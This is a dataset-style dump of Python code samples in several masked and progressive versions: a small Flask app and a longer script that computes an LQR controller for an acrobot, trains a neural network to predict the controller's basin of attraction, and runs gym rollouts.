name='logout'),\n webapp2.Route('/action', ActionHandler, name='action'),\n webapp2.Route('/addjob', AddJobHandler, name='addjob')\n], config=config, debug=True)",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
<|reserved_special_token_0|>
@app.route('/')
def index():
return '2018/6/1 hello python'
@app.route('/news')
def news():
return '内蒙古新闻资讯,请选择浏览'
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
@app.route('/')
def index():
return '2018/6/1 hello python'
@app.route('/news')
def news():
return '内蒙古新闻资讯,请选择浏览'
if __name__ == '__main__':
manager.run()
<|reserved_special_token_1|>
<|reserved_special_token_0|>
app = Flask(__name__)
manager = Manager(app)
@app.route('/')
def index():
return '2018/6/1 hello python'
@app.route('/news')
def news():
return '内蒙古新闻资讯,请选择浏览'
if __name__ == '__main__':
manager.run()
<|reserved_special_token_1|>
from flask import Flask
from flask_script import Manager
app = Flask(__name__)
manager = Manager(app)
@app.route('/')
def index():
return '2018/6/1 hello python'
@app.route('/news')
def news():
return '内蒙古新闻资讯,请选择浏览'
if __name__ == '__main__':
manager.run()
|
flexible
|
{
"blob_id": "f9d8280d765826b05bfa7989645e487431799f85",
"index": 7809,
"step-1": "<mask token>\n\n\n@app.route('/')\ndef index():\n return '2018/6/1 hello python'\n\n\n@app.route('/news')\ndef news():\n return '内蒙古新闻资讯,请选择浏览'\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\n@app.route('/')\ndef index():\n return '2018/6/1 hello python'\n\n\n@app.route('/news')\ndef news():\n return '内蒙古新闻资讯,请选择浏览'\n\n\nif __name__ == '__main__':\n manager.run()\n",
"step-3": "<mask token>\napp = Flask(__name__)\nmanager = Manager(app)\n\n\n@app.route('/')\ndef index():\n return '2018/6/1 hello python'\n\n\n@app.route('/news')\ndef news():\n return '内蒙古新闻资讯,请选择浏览'\n\n\nif __name__ == '__main__':\n manager.run()\n",
"step-4": "from flask import Flask\nfrom flask_script import Manager\napp = Flask(__name__)\nmanager = Manager(app)\n\n\n@app.route('/')\ndef index():\n return '2018/6/1 hello python'\n\n\n@app.route('/news')\ndef news():\n return '内蒙古新闻资讯,请选择浏览'\n\n\nif __name__ == '__main__':\n manager.run()\n",
"step-5": null,
"step-ids": [
2,
3,
4,
5
]
}
|
[
2,
3,
4,
5
] |
<|reserved_special_token_0|>
def control(q):
gs = np.array([pi / 2, 0, 0, 0])
return -k.dot(q - gs)
def reward_fn(s, a):
reward = np.sin(s[0]) + 2 * np.sin(s[0] + s[1])
done = reward < 2
return reward, done
def do_rollout(args):
x, trial_num = args
th1, th2, dth1, dth2 = x
np.random.seed(trial_num)
local_reward_hist = np.ones((env.num_steps, 1)) * -1
obs = env.reset(init_vec=[th1, th2, dth1, dth2])
for i in range(env.num_steps):
actions = np.clip(np.asarray(control(obs)), -max_torque, max_torque)
obs, reward, done, _ = env.step(actions)
local_reward_hist[i, :] = np.copy(reward)
if done:
break
return local_reward_hist, i
<|reserved_special_token_0|>
def reward_fn(s, a):
reward = np.sin(s[0]) + 2 * np.sin(s[0] + s[1])
return reward, False
def do_rollout(trial_num):
np.random.seed(trial_num)
act_hold = 20
hold_count = 0
obs = env.reset()
local_lqr = False
actions = np.random.randn(1) * 3
local_state_hist = np.zeros((env.num_steps, env.observation_space.shape[0])
)
local_reward_hist = np.zeros((env.num_steps, 1))
local_gate_hist = np.zeros((env.num_steps, 1))
local_action_hist = np.zeros((env.num_steps, 1))
for i in range(env.num_steps):
obs = np.array(obs, dtype=np.float32)
if sig(net(obs)) > 0.85:
actions = np.clip(np.asarray(control(obs)), -max_torque, max_torque
)
local_lqr = True
local_gate_hist[i] = 1
else:
local_gate_hist[i] = 0
if hold_count == act_hold:
actions = np.random.randn(1) * 3
hold_count = 0
hold_count += 1
obs, reward, done, _ = env.step(actions)
local_action_hist[i, :] = np.copy(actions)
local_state_hist[i, :] = np.copy(obs)
local_reward_hist[i, :] = np.copy(reward)
return (local_action_hist, local_state_hist, local_reward_hist,
local_gate_hist, local_lqr)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
assert np.linalg.matrix_rank(Ctr) == 4
<|reserved_special_token_0|>
print(k)
def control(q):
gs = np.array([pi / 2, 0, 0, 0])
return -k.dot(q - gs)
def reward_fn(s, a):
reward = np.sin(s[0]) + 2 * np.sin(s[0] + s[1])
done = reward < 2
return reward, done
def do_rollout(args):
x, trial_num = args
th1, th2, dth1, dth2 = x
np.random.seed(trial_num)
local_reward_hist = np.ones((env.num_steps, 1)) * -1
obs = env.reset(init_vec=[th1, th2, dth1, dth2])
for i in range(env.num_steps):
actions = np.clip(np.asarray(control(obs)), -max_torque, max_torque)
obs, reward, done, _ = env.step(actions)
local_reward_hist[i, :] = np.copy(reward)
if done:
break
return local_reward_hist, i
<|reserved_special_token_0|>
samples *= np.array([th1_min - th1_max, th2_min - th2_max, th1dot_min -
th1dot_max, th2dot_min - th2dot_max])
samples += np.array([th1_max, th2_max, th1dot_max, th2dot_max])
<|reserved_special_token_0|>
for i, res in enumerate(pool.imap(do_rollout, zip(samples, range(int(
num_trials / 2))))):
rews, steps = res
reward_hist[i, :, :] = rews
total_steps += steps
X[i, :] = samples[i, :]
Y[i] = sum(rews) > env.num_steps * 3 - 10
<|reserved_special_token_0|>
samples *= np.array([th1_min - th1_max, th2_min - th2_max, th1dot_min -
th1dot_max, th2dot_min - th2dot_max])
samples += np.array([th1_max, th2_max, th1dot_max, th2dot_max])
<|reserved_special_token_0|>
for i, res in enumerate(pool.imap(do_rollout, zip(samples, range(int(
num_trials / 2), int(num_trials))))):
rews, steps = res
reward_hist[i, :, :] = rews
total_steps += steps
X[i + int(num_trials / 2), :] = samples[i, :]
Y[i + int(num_trials / 2)] = sum(rews) > env.num_steps * 3 - 5
print(time.time() - start)
<|reserved_special_token_0|>
plt.close()
plt.plot(loss_hist)
plt.show()
<|reserved_special_token_0|>
for i, j in product(range(n_th), range(n_th)):
coords[j, i, :] = np.array([th1_vals[i], th2_vals[j], 0, 0])
<|reserved_special_token_0|>
print(end - start)
<|reserved_special_token_0|>
ax.set_title('Theta')
ax.set_xlabel('Th1')
ax.set_ylabel('Th2')
ax.axis([x.min(), x.max(), y.min(), y.max()])
fig.colorbar(c, ax=ax)
plt.show()
<|reserved_special_token_0|>
for i, j in product(range(n_th), range(n_th)):
coords[j, i, :] = np.array([pi / 2, 0, th1dot_vals[i], th2dot_vals[j]])
<|reserved_special_token_0|>
print(end - start)
<|reserved_special_token_0|>
ax.set_title('DTheta')
ax.set_xlabel('dth1')
ax.set_ylabel('dth2')
ax.axis([x.min(), x.max(), y.min(), y.max()])
fig.colorbar(c, ax=ax)
plt.show()
torch.set_default_dtype(torch.float32)
def reward_fn(s, a):
reward = np.sin(s[0]) + 2 * np.sin(s[0] + s[1])
return reward, False
def do_rollout(trial_num):
np.random.seed(trial_num)
act_hold = 20
hold_count = 0
obs = env.reset()
local_lqr = False
actions = np.random.randn(1) * 3
local_state_hist = np.zeros((env.num_steps, env.observation_space.shape[0])
)
local_reward_hist = np.zeros((env.num_steps, 1))
local_gate_hist = np.zeros((env.num_steps, 1))
local_action_hist = np.zeros((env.num_steps, 1))
for i in range(env.num_steps):
obs = np.array(obs, dtype=np.float32)
if sig(net(obs)) > 0.85:
actions = np.clip(np.asarray(control(obs)), -max_torque, max_torque
)
local_lqr = True
local_gate_hist[i] = 1
else:
local_gate_hist[i] = 0
if hold_count == act_hold:
actions = np.random.randn(1) * 3
hold_count = 0
hold_count += 1
obs, reward, done, _ = env.step(actions)
local_action_hist[i, :] = np.copy(actions)
local_state_hist[i, :] = np.copy(obs)
local_reward_hist[i, :] = np.copy(reward)
return (local_action_hist, local_state_hist, local_reward_hist,
local_gate_hist, local_lqr)
<|reserved_special_token_0|>
for i, res in enumerate(pool.imap(do_rollout, range(num_trials))):
acts, obs, rews, gate, lqr_on = res
action_hist[i, :, :] = acts
state_hist[i, :, :] = obs
reward_hist[i, :, :] = rews
gate_hist[i, :, :] = gate
err_hist[i] = np.sqrt(sum((state_hist[i, -1, :] - np.array([pi / 2, 0,
0, 0])) ** 2))
if lqr_on:
lqr_list.append(i)
if err_hist[i] < 2:
success_list.append(i)
print(len(lqr_list))
print(len(success_list))
print((time.time() - global_start) / 60)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
global_start = time.time()
m1 = 1
m2 = 1
l1 = 1
l2 = 2
lc1 = 0.5
lc2 = 1
I1 = 0.083
I2 = 0.33
g = 9.8
dt = 0.01
max_torque = 25
integrator = euler
Q = np.identity(4)
Q[0, 0] = 1
Q[1, 1] = 1
Q[2, 2] = 1
Q[3, 3] = 1
R = np.identity(2) * 0.01
eval_max_t = 10
th1 = pi / 2
th2 = 0
th1d = 0
th2d = 0
TAU = np.array([[0], [1]])
m11 = m1 * lc1 ** 2 + m2 * (l1 ** 2 + lc2 ** 2 + 2 * l1 * lc2 * cos(th2)
) + I1 + I2
m22 = m2 * lc2 ** 2 + I2
m12 = m2 * (lc2 ** 2 + l1 * lc2 * cos(th2)) + I2
M = np.array([[m11, m12], [m12, m22]])
h1 = -m2 * l1 * lc2 * sin(th2) * th2d ** 2 - 2 * m2 * l1 * lc2 * sin(th2
) * th2d * th1d
h2 = m2 * l1 * lc2 * sin(th2) * th1d ** 2
H = np.array([[h1], [h2]])
phi1 = (m1 * lc1 + m2 * l1) * g * cos(th1) + m2 * lc2 * g * cos(th1 + th2)
phi2 = m2 * lc2 * g * cos(th1 + th2)
PHI = np.array([[phi1], [phi2]])
Bl = np.linalg.inv(M) @ TAU
Blin = np.array([[0, 0], [0, 0], [0, Bl[0].item()], [0, Bl[1].item()]])
DPHI = np.array([[-g * (m1 * lc1 + m2 * l1 + m2 * lc2), -m2 * lc2 * g], [-
m2 * lc2 * g, -m2 * lc2 * g]])
Al = -np.linalg.inv(M) @ DPHI
Alin = np.array([[0, 0, 1, 0], [0, 0, 0, 1], [Al[0, 0], Al[0, 1], 0, 0], [
Al[1, 0], Al[1, 1], 0, 0]])
Ctr = ctrb(Alin, Blin)
assert np.linalg.matrix_rank(Ctr) == 4
K, S, E = lqr(Alin, Blin, Q, R)
k = np.array(K[1, :])
print(k)
def control(q):
gs = np.array([pi / 2, 0, 0, 0])
return -k.dot(q - gs)
def reward_fn(s, a):
reward = np.sin(s[0]) + 2 * np.sin(s[0] + s[1])
done = reward < 2
return reward, done
def do_rollout(args):
x, trial_num = args
th1, th2, dth1, dth2 = x
np.random.seed(trial_num)
local_reward_hist = np.ones((env.num_steps, 1)) * -1
obs = env.reset(init_vec=[th1, th2, dth1, dth2])
for i in range(env.num_steps):
actions = np.clip(np.asarray(control(obs)), -max_torque, max_torque)
obs, reward, done, _ = env.step(actions)
local_reward_hist[i, :] = np.copy(reward)
if done:
break
return local_reward_hist, i
start = time.time()
config = {'init_state': [0, 0, 0, 0], 'max_torque': max_torque,
'init_state_weights': [0, 0, 0, 0], 'max_t': 2.5, 'dt': dt, 'm2': m2,
'm1': m1, 'l1': l1, 'lc1': lc1, 'lc2': lc2, 'i1': I1, 'i2': I2,
'integrator': integrator, 'reward_fn': reward_fn, 'act_hold': 1}
env = gym.make('su_acrobot-v0', **config)
num_trials = 200000
reward_hist = np.zeros((num_trials, env.num_steps, 1))
X = np.zeros((num_trials, 4), dtype=np.float32)
Y = np.zeros((num_trials, 1), dtype=np.float32)
th1_min = pi / 2 - 0.5
th1_max = pi / 2 + 0.5
th2_min = -1
th2_max = 1
th1dot_min = -5
th1dot_max = 5
th2dot_min = -10
th2dot_max = 10
samples = np.random.random_sample((int(num_trials / 2), 4))
samples *= np.array([th1_min - th1_max, th2_min - th2_max, th1dot_min -
th1dot_max, th2dot_min - th2dot_max])
samples += np.array([th1_max, th2_max, th1dot_max, th2dot_max])
total_steps = 0
pool = Pool()
for i, res in enumerate(pool.imap(do_rollout, zip(samples, range(int(
num_trials / 2))))):
rews, steps = res
reward_hist[i, :, :] = rews
total_steps += steps
X[i, :] = samples[i, :]
Y[i] = sum(rews) > env.num_steps * 3 - 10
th1_min = 0
th1_max = 2 * pi
th2_min = -pi
th2_max = pi
th1dot_min = -10
th1dot_max = 10
th2dot_min = -30
th2dot_max = 30
samples = np.random.random_sample((int(num_trials / 2), 4))
samples *= np.array([th1_min - th1_max, th2_min - th2_max, th1dot_min -
th1dot_max, th2dot_min - th2dot_max])
samples += np.array([th1_max, th2_max, th1dot_max, th2dot_max])
total_steps = 0
for i, res in enumerate(pool.imap(do_rollout, zip(samples, range(int(
num_trials / 2), int(num_trials))))):
rews, steps = res
reward_hist[i, :, :] = rews
total_steps += steps
X[i + int(num_trials / 2), :] = samples[i, :]
Y[i + int(num_trials / 2)] = sum(rews) > env.num_steps * 3 - 5
print(time.time() - start)
<|reserved_special_token_0|>
net = MLP(4, 1, 2, 32)
Y0 = np.ones((num_trials, 1), dtype=np.float32)
w = 0.01
class_weight = torch.tensor(Y.shape[0] / sum(Y) * w, dtype=torch.float32)
loss_hist = fit_model(net, X, Y, 50, batch_size=2048, loss_fn=torch.nn.
BCEWithLogitsLoss(pos_weight=class_weight))
plt.close()
plt.plot(loss_hist)
plt.show()
n_thdot = 1
n_th = 1000
th1_vals = np.linspace(0, 2 * pi, n_th)
th2_vals = np.linspace(-pi, pi, n_th)
th1dot_vals = np.linspace(-10, 10, n_th)
th2dot_vals = np.linspace(-30, 30, n_th)
sig = torch.nn.Sigmoid()
coords = np.zeros((n_th, n_th, 4), dtype=np.float32)
<|reserved_special_token_0|>
start = time.time()
for i, j in product(range(n_th), range(n_th)):
coords[j, i, :] = np.array([th1_vals[i], th2_vals[j], 0, 0])
preds = sig(net(coords.reshape(-1, 4)).reshape(n_th, n_th).detach())
end = time.time()
print(end - start)
fig, ax = plt.subplots(n_thdot, n_thdot, figsize=(8, 8))
x, y = np.meshgrid(th1_vals, th2_vals)
z = preds
z = z[:-1, :-1]
z_min, z_max = 0, np.abs(z).max()
c = ax.pcolormesh(x, y, z, cmap='RdBu', vmin=z_min, vmax=z_max)
ax.set_title('Theta')
ax.set_xlabel('Th1')
ax.set_ylabel('Th2')
ax.axis([x.min(), x.max(), y.min(), y.max()])
fig.colorbar(c, ax=ax)
plt.show()
coords = np.zeros((n_th, n_th, 4), dtype=np.float32)
start = time.time()
for i, j in product(range(n_th), range(n_th)):
coords[j, i, :] = np.array([pi / 2, 0, th1dot_vals[i], th2dot_vals[j]])
preds = sig(net(coords.reshape(-1, 4)).reshape(n_th, n_th).detach())
end = time.time()
print(end - start)
fig, ax = plt.subplots(n_thdot, n_thdot, figsize=(8, 8))
x, y = np.meshgrid(th1dot_vals, th2dot_vals)
z = preds
z = z[:-1, :-1]
z_min, z_max = 0, np.abs(z).max()
c = ax.pcolormesh(x, y, z, cmap='RdBu', vmin=z_min, vmax=z_max)
ax.set_title('DTheta')
ax.set_xlabel('dth1')
ax.set_ylabel('dth2')
ax.axis([x.min(), x.max(), y.min(), y.max()])
fig.colorbar(c, ax=ax)
plt.show()
torch.set_default_dtype(torch.float32)
def reward_fn(s, a):
reward = np.sin(s[0]) + 2 * np.sin(s[0] + s[1])
return reward, False
def do_rollout(trial_num):
np.random.seed(trial_num)
act_hold = 20
hold_count = 0
obs = env.reset()
local_lqr = False
actions = np.random.randn(1) * 3
local_state_hist = np.zeros((env.num_steps, env.observation_space.shape[0])
)
local_reward_hist = np.zeros((env.num_steps, 1))
local_gate_hist = np.zeros((env.num_steps, 1))
local_action_hist = np.zeros((env.num_steps, 1))
for i in range(env.num_steps):
obs = np.array(obs, dtype=np.float32)
if sig(net(obs)) > 0.85:
actions = np.clip(np.asarray(control(obs)), -max_torque, max_torque
)
local_lqr = True
local_gate_hist[i] = 1
else:
local_gate_hist[i] = 0
if hold_count == act_hold:
actions = np.random.randn(1) * 3
hold_count = 0
hold_count += 1
obs, reward, done, _ = env.step(actions)
local_action_hist[i, :] = np.copy(actions)
local_state_hist[i, :] = np.copy(obs)
local_reward_hist[i, :] = np.copy(reward)
return (local_action_hist, local_state_hist, local_reward_hist,
local_gate_hist, local_lqr)
config = {'init_state': [-pi / 2, 0, 0, 0], 'max_torque': max_torque,
'init_state_weights': [1, 1, 5, 5], 'dt': dt, 'm2': m2, 'm1': m1, 'l1':
l1, 'lc1': lc1, 'lc2': lc2, 'i1': I1, 'i2': I2, 'integrator':
integrator, 'reward_fn': reward_fn, 'act_hold': 1, 'max_t': 10}
env = gym.make('su_acrobot-v0', **config)
num_trials = 1000
action_hist = np.zeros((num_trials, env.num_steps, 1))
state_hist = np.zeros((num_trials, env.num_steps, env.observation_space.
shape[0]))
reward_hist = np.zeros((num_trials, env.num_steps, 1))
gate_hist = np.zeros((num_trials, env.num_steps, 1))
err_hist = np.zeros((num_trials, 1))
lqr_list = []
success_list = []
act_hold = 20
hold_count = 0
obs = env.reset()
start = time.time()
pool = Pool()
for i, res in enumerate(pool.imap(do_rollout, range(num_trials))):
acts, obs, rews, gate, lqr_on = res
action_hist[i, :, :] = acts
state_hist[i, :, :] = obs
reward_hist[i, :, :] = rews
gate_hist[i, :, :] = gate
err_hist[i] = np.sqrt(sum((state_hist[i, -1, :] - np.array([pi / 2, 0,
0, 0])) ** 2))
if lqr_on:
lqr_list.append(i)
if err_hist[i] < 2:
success_list.append(i)
print(len(lqr_list))
print(len(success_list))
print((time.time() - global_start) / 60)
<|reserved_special_token_1|>
import numpy as np
from numpy import sin, cos, pi
import gym
import seagul.envs
from seagul.integration import rk4, euler
from control import lqr, ctrb
from torch.multiprocessing import Pool
import matplotlib.pyplot as plt
import matplotlib
import time
global_start = time.time()
m1 = 1
m2 = 1
l1 = 1
l2 = 2
lc1 = 0.5
lc2 = 1
I1 = 0.083
I2 = 0.33
g = 9.8
dt = 0.01
max_torque = 25
integrator = euler
Q = np.identity(4)
Q[0, 0] = 1
Q[1, 1] = 1
Q[2, 2] = 1
Q[3, 3] = 1
R = np.identity(2) * 0.01
eval_max_t = 10
th1 = pi / 2
th2 = 0
th1d = 0
th2d = 0
TAU = np.array([[0], [1]])
m11 = m1 * lc1 ** 2 + m2 * (l1 ** 2 + lc2 ** 2 + 2 * l1 * lc2 * cos(th2)
) + I1 + I2
m22 = m2 * lc2 ** 2 + I2
m12 = m2 * (lc2 ** 2 + l1 * lc2 * cos(th2)) + I2
M = np.array([[m11, m12], [m12, m22]])
h1 = -m2 * l1 * lc2 * sin(th2) * th2d ** 2 - 2 * m2 * l1 * lc2 * sin(th2
) * th2d * th1d
h2 = m2 * l1 * lc2 * sin(th2) * th1d ** 2
H = np.array([[h1], [h2]])
phi1 = (m1 * lc1 + m2 * l1) * g * cos(th1) + m2 * lc2 * g * cos(th1 + th2)
phi2 = m2 * lc2 * g * cos(th1 + th2)
PHI = np.array([[phi1], [phi2]])
Bl = np.linalg.inv(M) @ TAU
Blin = np.array([[0, 0], [0, 0], [0, Bl[0].item()], [0, Bl[1].item()]])
DPHI = np.array([[-g * (m1 * lc1 + m2 * l1 + m2 * lc2), -m2 * lc2 * g], [-
m2 * lc2 * g, -m2 * lc2 * g]])
Al = -np.linalg.inv(M) @ DPHI
Alin = np.array([[0, 0, 1, 0], [0, 0, 0, 1], [Al[0, 0], Al[0, 1], 0, 0], [
Al[1, 0], Al[1, 1], 0, 0]])
Ctr = ctrb(Alin, Blin)
assert np.linalg.matrix_rank(Ctr) == 4
K, S, E = lqr(Alin, Blin, Q, R)
k = np.array(K[1, :])
print(k)
def control(q):
gs = np.array([pi / 2, 0, 0, 0])
return -k.dot(q - gs)
def reward_fn(s, a):
reward = np.sin(s[0]) + 2 * np.sin(s[0] + s[1])
done = reward < 2
return reward, done
def do_rollout(args):
x, trial_num = args
th1, th2, dth1, dth2 = x
np.random.seed(trial_num)
local_reward_hist = np.ones((env.num_steps, 1)) * -1
obs = env.reset(init_vec=[th1, th2, dth1, dth2])
for i in range(env.num_steps):
actions = np.clip(np.asarray(control(obs)), -max_torque, max_torque)
obs, reward, done, _ = env.step(actions)
local_reward_hist[i, :] = np.copy(reward)
if done:
break
return local_reward_hist, i
start = time.time()
config = {'init_state': [0, 0, 0, 0], 'max_torque': max_torque,
'init_state_weights': [0, 0, 0, 0], 'max_t': 2.5, 'dt': dt, 'm2': m2,
'm1': m1, 'l1': l1, 'lc1': lc1, 'lc2': lc2, 'i1': I1, 'i2': I2,
'integrator': integrator, 'reward_fn': reward_fn, 'act_hold': 1}
env = gym.make('su_acrobot-v0', **config)
num_trials = 200000
reward_hist = np.zeros((num_trials, env.num_steps, 1))
X = np.zeros((num_trials, 4), dtype=np.float32)
Y = np.zeros((num_trials, 1), dtype=np.float32)
th1_min = pi / 2 - 0.5
th1_max = pi / 2 + 0.5
th2_min = -1
th2_max = 1
th1dot_min = -5
th1dot_max = 5
th2dot_min = -10
th2dot_max = 10
samples = np.random.random_sample((int(num_trials / 2), 4))
samples *= np.array([th1_min - th1_max, th2_min - th2_max, th1dot_min -
th1dot_max, th2dot_min - th2dot_max])
samples += np.array([th1_max, th2_max, th1dot_max, th2dot_max])
total_steps = 0
pool = Pool()
for i, res in enumerate(pool.imap(do_rollout, zip(samples, range(int(
num_trials / 2))))):
rews, steps = res
reward_hist[i, :, :] = rews
total_steps += steps
X[i, :] = samples[i, :]
Y[i] = sum(rews) > env.num_steps * 3 - 10
th1_min = 0
th1_max = 2 * pi
th2_min = -pi
th2_max = pi
th1dot_min = -10
th1dot_max = 10
th2dot_min = -30
th2dot_max = 30
samples = np.random.random_sample((int(num_trials / 2), 4))
samples *= np.array([th1_min - th1_max, th2_min - th2_max, th1dot_min -
th1dot_max, th2dot_min - th2dot_max])
samples += np.array([th1_max, th2_max, th1dot_max, th2dot_max])
total_steps = 0
for i, res in enumerate(pool.imap(do_rollout, zip(samples, range(int(
num_trials / 2), int(num_trials))))):
rews, steps = res
reward_hist[i, :, :] = rews
total_steps += steps
X[i + int(num_trials / 2), :] = samples[i, :]
Y[i + int(num_trials / 2)] = sum(rews) > env.num_steps * 3 - 5
print(time.time() - start)
from seagul.nn import MLP, fit_model
import torch
net = MLP(4, 1, 2, 32)
Y0 = np.ones((num_trials, 1), dtype=np.float32)
w = 0.01
class_weight = torch.tensor(Y.shape[0] / sum(Y) * w, dtype=torch.float32)
loss_hist = fit_model(net, X, Y, 50, batch_size=2048, loss_fn=torch.nn.
BCEWithLogitsLoss(pos_weight=class_weight))
plt.close()
plt.plot(loss_hist)
plt.show()
n_thdot = 1
n_th = 1000
th1_vals = np.linspace(0, 2 * pi, n_th)
th2_vals = np.linspace(-pi, pi, n_th)
th1dot_vals = np.linspace(-10, 10, n_th)
th2dot_vals = np.linspace(-30, 30, n_th)
sig = torch.nn.Sigmoid()
coords = np.zeros((n_th, n_th, 4), dtype=np.float32)
from itertools import product
start = time.time()
for i, j in product(range(n_th), range(n_th)):
coords[j, i, :] = np.array([th1_vals[i], th2_vals[j], 0, 0])
preds = sig(net(coords.reshape(-1, 4)).reshape(n_th, n_th).detach())
end = time.time()
print(end - start)
fig, ax = plt.subplots(n_thdot, n_thdot, figsize=(8, 8))
x, y = np.meshgrid(th1_vals, th2_vals)
z = preds
z = z[:-1, :-1]
z_min, z_max = 0, np.abs(z).max()
c = ax.pcolormesh(x, y, z, cmap='RdBu', vmin=z_min, vmax=z_max)
ax.set_title('Theta')
ax.set_xlabel('Th1')
ax.set_ylabel('Th2')
ax.axis([x.min(), x.max(), y.min(), y.max()])
fig.colorbar(c, ax=ax)
plt.show()
coords = np.zeros((n_th, n_th, 4), dtype=np.float32)
start = time.time()
for i, j in product(range(n_th), range(n_th)):
coords[j, i, :] = np.array([pi / 2, 0, th1dot_vals[i], th2dot_vals[j]])
preds = sig(net(coords.reshape(-1, 4)).reshape(n_th, n_th).detach())
end = time.time()
print(end - start)
fig, ax = plt.subplots(n_thdot, n_thdot, figsize=(8, 8))
x, y = np.meshgrid(th1dot_vals, th2dot_vals)
z = preds
z = z[:-1, :-1]
z_min, z_max = 0, np.abs(z).max()
c = ax.pcolormesh(x, y, z, cmap='RdBu', vmin=z_min, vmax=z_max)
ax.set_title('DTheta')
ax.set_xlabel('dth1')
ax.set_ylabel('dth2')
ax.axis([x.min(), x.max(), y.min(), y.max()])
fig.colorbar(c, ax=ax)
plt.show()
torch.set_default_dtype(torch.float32)
def reward_fn(s, a):
reward = np.sin(s[0]) + 2 * np.sin(s[0] + s[1])
return reward, False
def do_rollout(trial_num):
np.random.seed(trial_num)
act_hold = 20
hold_count = 0
obs = env.reset()
local_lqr = False
actions = np.random.randn(1) * 3
local_state_hist = np.zeros((env.num_steps, env.observation_space.shape[0])
)
local_reward_hist = np.zeros((env.num_steps, 1))
local_gate_hist = np.zeros((env.num_steps, 1))
local_action_hist = np.zeros((env.num_steps, 1))
for i in range(env.num_steps):
obs = np.array(obs, dtype=np.float32)
if sig(net(obs)) > 0.85:
actions = np.clip(np.asarray(control(obs)), -max_torque, max_torque
)
local_lqr = True
local_gate_hist[i] = 1
else:
local_gate_hist[i] = 0
if hold_count == act_hold:
actions = np.random.randn(1) * 3
hold_count = 0
hold_count += 1
obs, reward, done, _ = env.step(actions)
local_action_hist[i, :] = np.copy(actions)
local_state_hist[i, :] = np.copy(obs)
local_reward_hist[i, :] = np.copy(reward)
return (local_action_hist, local_state_hist, local_reward_hist,
local_gate_hist, local_lqr)
config = {'init_state': [-pi / 2, 0, 0, 0], 'max_torque': max_torque,
'init_state_weights': [1, 1, 5, 5], 'dt': dt, 'm2': m2, 'm1': m1, 'l1':
l1, 'lc1': lc1, 'lc2': lc2, 'i1': I1, 'i2': I2, 'integrator':
integrator, 'reward_fn': reward_fn, 'act_hold': 1, 'max_t': 10}
env = gym.make('su_acrobot-v0', **config)
num_trials = 1000
action_hist = np.zeros((num_trials, env.num_steps, 1))
state_hist = np.zeros((num_trials, env.num_steps, env.observation_space.
shape[0]))
reward_hist = np.zeros((num_trials, env.num_steps, 1))
gate_hist = np.zeros((num_trials, env.num_steps, 1))
err_hist = np.zeros((num_trials, 1))
lqr_list = []
success_list = []
act_hold = 20
hold_count = 0
obs = env.reset()
start = time.time()
pool = Pool()
for i, res in enumerate(pool.imap(do_rollout, range(num_trials))):
acts, obs, rews, gate, lqr_on = res
action_hist[i, :, :] = acts
state_hist[i, :, :] = obs
reward_hist[i, :, :] = rews
gate_hist[i, :, :] = gate
err_hist[i] = np.sqrt(sum((state_hist[i, -1, :] - np.array([pi / 2, 0,
0, 0])) ** 2))
if lqr_on:
lqr_list.append(i)
if err_hist[i] < 2:
success_list.append(i)
print(len(lqr_list))
print(len(success_list))
print((time.time() - global_start) / 60)
<|reserved_special_token_1|>
# %%
import numpy as np
from numpy import sin, cos, pi
import gym
import seagul.envs
from seagul.integration import rk4,euler
from control import lqr, ctrb
from torch.multiprocessing import Pool
import matplotlib.pyplot as plt
import matplotlib
#matplotlib.use('Qt5Agg')
import time
global_start = time.time()
# %%
m1 = 1
m2 = 1
l1 = 1
l2 = 2
lc1 = .5
lc2 = 1
I1 = .083
I2 = .33
g = 9.8
#
# m1 = 1
# m2 = 1
# l1 = 1
# l2 = 1
# lc1 = .5
# lc2 = .5
# I1 = .2
# I2 = 1.0
# g = 9.8
dt = .01
max_torque = 25
integrator = euler
Q = np.identity(4)
Q[0, 0] = 1
Q[1, 1] = 1
Q[2, 2] = 1
Q[3, 3] = 1
#
# Q = np.array([[1000, -500, 0,0],[-500, 1000, 0, 0],[0, 0, 1000, -500],[0,0,-500,1000]])
R = np.identity(2) * .01
eval_max_t = 10
th1 = pi / 2
th2 = 0
th1d = 0
th2d = 0
TAU = np.array([[0], [1]])
m11 = m1 * lc1 ** 2 + m2 * (l1 ** 2 + lc2 ** 2 + 2 * l1 * lc2 * cos(th2)) + I1 + I2
m22 = m2 * lc2 ** 2 + I2
m12 = m2 * (lc2 ** 2 + l1 * lc2 * cos(th2)) + I2
M = np.array([[m11, m12], [m12, m22]])
h1 = -m2 * l1 * lc2 * sin(th2) * th2d ** 2 - 2 * m2 * l1 * lc2 * sin(th2) * th2d * th1d
h2 = m2 * l1 * lc2 * sin(th2) * th1d ** 2
H = np.array([[h1], [h2]])
phi1 = (m1 * lc1 + m2 * l1) * g * cos(th1) + m2 * lc2 * g * cos(th1 + th2)
phi2 = m2 * lc2 * g * cos(th1 + th2)
PHI = np.array([[phi1], [phi2]])
Bl = np.linalg.inv(M) @ TAU
Blin = np.array([[0, 0], [0, 0], [0, Bl[0].item()], [0, Bl[1].item()]])
DPHI = np.array([[-g * (m1 * lc1 + m2 * l1 + m2 * lc2), -m2 * lc2 * g], [-m2 * lc2 * g, -m2 * lc2 * g]])
Al = -np.linalg.inv(M) @ DPHI
Alin = np.array([[0, 0, 1, 0], [0, 0, 0, 1], [Al[0, 0], Al[0, 1], 0, 0], [Al[1, 0], Al[1, 1], 0, 0]])
Ctr = ctrb(Alin, Blin)
assert np.linalg.matrix_rank(Ctr) == 4
K, S, E = lqr(Alin, Blin, Q, R)
k = np.array(K[1, :])
print(k)
def control(q):
gs = np.array([pi / 2, 0, 0, 0])
return -k.dot(q - gs)
def reward_fn(s, a):
reward = np.sin(s[0]) + 2 * np.sin(s[0] + s[1])
done = reward < 2
return reward, done
def do_rollout(args):
x, trial_num = args
th1, th2, dth1, dth2 = x
np.random.seed(trial_num)
local_reward_hist = np.ones((env.num_steps, 1)) * -1
obs = env.reset(init_vec=[th1, th2, dth1, dth2])
for i in range(env.num_steps):
actions = np.clip(np.asarray(control(obs)), -max_torque, max_torque)
obs, reward, done, _ = env.step(actions)
local_reward_hist[i, :] = np.copy(reward)
if done:
break
return local_reward_hist, i
# %%b
start = time.time()
config = {"init_state": [0, 0, 0, 0],
"max_torque": max_torque,
